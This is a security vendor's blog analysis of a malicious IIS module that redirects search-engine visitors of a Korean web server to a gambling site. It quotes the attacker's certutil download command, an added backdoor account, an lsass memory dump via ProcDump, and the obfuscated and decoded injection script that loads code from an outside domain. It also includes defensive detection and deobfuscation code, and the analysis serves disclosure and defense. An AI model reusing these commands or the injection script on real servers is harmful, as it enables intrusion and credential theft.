AhnLab SEcurity intelligence Center (ASEC) has discovered evidence of a malware strain being distributed to web servers in South Korea that leads users to an illegal gambling site. After initially infiltrating a poorly managed Windows Internet Information Services (IIS) web server in Korea, the threat actor installed the Meterpreter backdoor, a port forwarding tool, and an IIS module malware. They then used ProcDump to exfiltrate account credentials from the server. IIS modules extend web server features such as authentication, HTTP responses, and logging. Modules can be developed using the IIS C++ API or the ASP.NET 2.0 API.
The IIS module malware discovered in this case monitors for a string in the HTTP header in the web server where the module is installed and sends a modified response value when certain conditions are met to expose ads for an illegal gambling website on Korean and Chinese portal websites. When users click the link, they are redirected to the illegal gambling website.
1. Meterpreter Backdoor
Before installing the Meterpreter backdoor in the web server, the threat actor executed various normal utilities such as ipconfig and systeminfo. The attacker’s behavior is likely done to collect information on the attack target before installing the IIS module malware. Table 1 below shows a timeline of the commands used by the threat actor.
| Command Execution Time | Executed CMD Command |
|---|---|
| Apr. 9, 2024 03:43:12 | ipconfig |
| Apr. 9, 2024 03:45:32 | systeminfo |
| Apr. 9, 2024 03:45:49 | whoami |
| Apr. 9, 2024 03:56:20 | powershell whoami |
| Apr. 9, 2024 04:17:13 | hostname |
| Apr. 9, 2024 04:17:21 | net1 user |
| Apr. 9, 2024 04:17:42 | query user |
| Apr. 9, 2024 04:22:10 | ping 45.154.12.215 |
| Apr. 9, 2024 04:23:18 | curl |
| Apr. 9, 2024 04:23:56 | certutil |
| Apr. 9, 2024 04:28:20 | certutil -urlcache -split -f hxxp://m****k*****l[.]com/msf.txt |
| Apr. 9, 2024 04:32:20 | %ALLUSERSPROFILE%\xx.txt |
The Meterpreter backdoor is executed after being given the threat actor’s IP and port number. Based on the analysis of the backdoor code, it is likely that the code communicated with the threat actor’s server to receive and execute a shellcode.
2. HTran (Port Forwarding Tool)
After installing the Meterpreter backdoor, the threat actor additionally installed the HTran utility through the w3wp.exe process. HTran is a port forwarding tool whose source code is published on GitHub. Port forwarding is a feature where data transmitted to a certain port is forwarded to another port. While it can be used in various ways depending on the threat actor, in most cases, HTran enables remote communication with the RDP port.
After installing the Meterpreter backdoor and HTran port forwarding tool, the threat actor created an attacker account to maintain persistence in the target system and establish a foothold. By creating the account, the threat actor can easily access the web server from outside without needing account credentials for that server.
| Command Execution Time | Executed CMD Command (Add Account) |
|---|---|
| Apr. 9, 2024 05:04:51 | net user kr$ test123!@# /add |
It took less than 2 hours for the threat actor to compromise the server, from initial access to the target to establishing a foothold and maintaining persistence. After maintaining persistence, the threat actor created the IIS module malware.
3. IIS Module Malware
Ordinarily, IIS modules exist as DLLs in the path C:\Windows\System32\inetsrv and are loaded into w3wp.exe (the IIS worker process) to run. To be executed after being loaded into w3wp.exe, a native module must be built with the IIS C++ API and must export a RegisterModule function. When a module is loaded, the HTTP header information of requests to the IIS web server is passed to the event handlers registered in RegisterModule, and each handler can process those request headers. Of the many available handlers, the identified malware strain registers its malicious code for the OnSendResponse handler, so that whenever a SendResponse event takes place in the IIS web server, the malicious handler (sub_7FFB3DB7E840) is executed.
OnSendResponse
-> Represents the method that will handle a SendResponse event, which occurs when IIS sends the response buffer.
The installed malware strain manipulates the response value for the HTTP header information requested to the web server. It checks the User-Agent, Referer, and other values of the incoming HTTP header to check the inflow path of the web page. If it contains strings related to certain search portal websites, the malware returns a link to an illegal gambling-related page instead of a normal web page.
Searching for information on a compromised Korean website on the portal website shows illegal online gambling-related pages (see Figure 7).
For a website to appear in a search portal's results, the web server must be exposed to the search engine. When the search engine crawls the web page to collect information, the search engine's HTTP header information is transmitted to the web server. When the header value matches certain keywords, the malware determines that a search engine is requesting access and transmits to it meta tag information (title, keywords, and description) belonging to an illegal online gambling website.
Through this process, users are shown illegal online gambling sites even when they search for legitimate sites on the portal website. The following information lists the search engines the malware checks for and explains its other key features.
[1] Sends a script response that redirects to “hxxps://ll.olacityviet.com/av.js” when the following keywords are matched
Checks whether the User-Agent header contains any of the following keywords
– naver|sogou|360|yisou|daum|google|coccoc
Checks whether the Referer header contains any of the following keywords
– naver.com|so.com|sogou.com|sm.cn|daum.net|google|coccoc
[2] Steals cookie information from the HTTP header
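As an added defensive check (this is not code from the ASEC post), the following Node.js script requests the same page once as a plain browser and once with a User-Agent and Referer that contain one of the keywords listed above, then reports scripts, SEO meta tags and titles that appear only in the crawler's view. The function names and the TARGET_URL environment variable are my own assumptions.

```javascript
// Added example (not ASEC's code): check a server you manage for the cloaking behaviour
// described above. Function names and the TARGET_URL environment variable are my choices.

// One request that would trigger the module (UA and Referer both contain "google", one of
// the keywords the module matches), and one plain browser request as the baseline.
const CRAWLER_HEADERS = {
  'User-Agent': 'Mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)',
  'Referer': 'https://www.google.com/',
};
const BROWSER_HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/125.0' };

// Extract what the module is known to tamper with: external scripts, SEO meta tags, title.
function extractMarkers(html) {
  const markers = new Set();
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)) markers.add(`script:${m[1]}`);
  const meta = /<meta\b[^>]*\bname\s*=\s*["'](title|keywords?|description)["'][^>]*\bcontent\s*=\s*["']([^"']*)["']/gi;
  for (const m of html.matchAll(meta)) markers.add(`meta:${m[1].toLowerCase()}=${m[2]}`);
  const title = html.match(/<title>([^<]*)<\/title>/i);
  if (title) markers.add(`title:${title[1].trim()}`);
  return markers;
}

// Anything the crawler sees that the browser does not is injected content.
function diffInjected(browserHtml, crawlerHtml) {
  const baseline = extractMarkers(browserHtml);
  return [...extractMarkers(crawlerHtml)].filter((m) => !baseline.has(m));
}

// Fetch the page both ways (Node 18+ global fetch) and return the injected markers.
async function checkSite(url) {
  const [browser, crawler] = await Promise.all([
    fetch(url, { headers: BROWSER_HEADERS, redirect: 'manual' }).then((r) => r.text()),
    fetch(url, { headers: CRAWLER_HEADERS, redirect: 'manual' }).then((r) => r.text()),
  ]);
  return diffInjected(browser, crawler);
}

if (process.env.TARGET_URL) {
  checkSite(process.env.TARGET_URL).then((found) => {
    console.log(found.length ? `Injected when crawled:\n${found.join('\n')}` : 'No difference');
  });
}
```

Run it against each of the other listed keywords as well, since the module may treat them differently, and compare against a known-good copy of the page rather than trusting the browser view alone.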
The obfuscated script below is the response the malware injects into the normal response to the HTTP request. Because of this code, users are redirected to the illegal online gambling website URL.
```html
<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
    // "p,a,c,k,e,r"-style packer: p = packed source, a = radix, c = token count, k = dictionary
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!''.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f'\w+'};c=1};j(c--)h(k[c])p=p.i(q s('\b'+e(c)+'\b','g'),k[c]);f p}('1["2"]["3"]('<0 4="5/6" 7="8://9.a/b.c"></0>');',l,l,'t|u|v|x|y|z|A|B|C|D|E|F|G'.H('|'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|ll.olacityviet|com|av|js|split'.split('|'), 0, {})) </script>
```
The following is the decoded script.
```javascript
document.write('<script src="hxxps://ll.olacityviet.com/av[.]js"></script>');
```
Particular caution is advised because although the malware currently redirects users to an illegal online gambling website, it can perform other malicious behaviors depending on the response script.
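To read such a response script without evaluating it, the following added example (not code from the ASEC post) is a static unpacker for the "p,a,c,k,e,r" layers shown above; it applies the packer's key encoding in reverse and is run here on the second layer recovered from the sample. The function names and the elided function body in INNER_LAYER are my assumptions.

```javascript
// Added example, not code from the ASEC post: a static unpacker for the "p,a,c,k,e,r"
// layers shown above, so the redirect payload can be read without evaluating it.
// INNER_LAYER is the second packer layer as recovered from the sample; function names are mine.

// The packer's key alphabet: 0-9, a-z, A-Z as digits of base `a`, most significant first.
function encodeKey(c, a) {
  const prefix = c < a ? '' : encodeKey(Math.floor(c / a), a);
  const d = c % a;
  return prefix + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// Substitute every key in `p` by its dictionary word. The packer does one `\bkey\b` replace
// per key from the highest index down; a single pass gives the same result here because the
// keys are whole words and none of the dictionary words is itself a key.
function unpack(p, a, c, k) {
  const dict = Object.create(null);
  while (c--) dict[encodeKey(c, a)] = k[c] || encodeKey(c, a);
  return p.replace(/\b\w+\b/g, (tok) => (tok in dict ? dict[tok] : tok));
}

// Pull (p, a, c, k) out of the trailing `}('p', a, c, 'k'.split('|'), 0, {})` call of a packed blob.
function unpackSource(src) {
  const m = src.match(/\}\('([\s\S]*)',\s*(\d+),\s*(\d+),\s*'([^']*)'\.split\('\|'\)/);
  if (!m) throw new Error('not a p,a,c,k,e,r blob');
  return unpack(m[1], Number(m[2]), Number(m[3]), m[4].split('|'));
}

// Second layer recovered from the sample above: base 13, 13 dictionary words.
// (The unpacker function body is elided as {...}; only the arguments matter for decoding.)
const INNER_LAYER = `eval(function(p,a,c,k,e,r){...}('1["2"]["3"]('<0 4="5/6" 7="8://9.a/b.c"></0>');',13,13,'script|window|document|write|type|text|javascript|src|https|ll.olacityviet|com|av|js'.split('|'),0,{}))`;

// Returns the de-obfuscated statement the malware injects into the response.
function decodeSample() {
  return unpackSource(INNER_LAYER);
}

console.log(decodeSample());
```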
4. Abuse of ProcDump
After installing the IIS module malware, the threat actor used ProcDump to dump the process memory of the current web server’s lsass.exe. This is an act of stealing account credentials in a way similar to Mimikatz and was probably used for lateral movement to another server connected to the web server.
| Command Execution Time | Executed CMD Command |
|---|---|
| Apr. 10, 2024 00:20:44 | %ALLUSERSPROFILE%\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip |
5. Conclusion
The threat actor initially infiltrated a poorly managed Windows web server and then went through the following stages: establishing a foothold, maintaining persistence, achieving their goals, and obtaining account credentials for lateral movement. Currently, search engines such as Shodan and FOFA can be used to find the IP address, open ports, services in use, and OS information of devices connected to the Internet around the world. The threat actor likely used such search engines to find attack targets as well. Thus, enterprise security managers must identify assets that may be exposed to threat actors through attack surface management and manage them, for example by applying the latest security patches.
File Detection
Meterpreter Backdoor
– Trojan/Win.Meterpreter.C644410 (2024.04.09.02)
IIS module malware (x64)
– Trojan/Win.Generic.C5408521 (2023.04.10.02)
IIS module malware (x86)
– Trojan/Win.Backdoor.C578523 (2023.01.18.03)
IoCs
MD5s
Meterpreter Backdoor
– d5312ab7f01fd74d399c392effdfe437
IIS module malware (x64)
– ebeb931a6dd91a227225f0ff92142f2b
IIS module malware (x86)
– 28dd72e322f6be382dac4fa9eb5cd09b
C&C URLs
C&C address of the Meterpreter backdoor
– 43.156.50[.]76
Illegal online gambling link-related URLs
– hxxp://ll.olacityviet[.]com
– hxxp://jsc.olacityviet[.]com
– hxxps://ll.olacityviet[.]com/av.js
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Case of Malware Distribution Linking to Illegal Gambling Website Targeting Korean Web Server appeared first on ASEC BLOG.